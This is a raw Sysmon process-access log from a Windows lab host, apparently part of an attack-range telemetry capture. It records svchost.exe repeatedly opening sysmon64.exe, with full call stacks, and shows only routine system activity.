12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 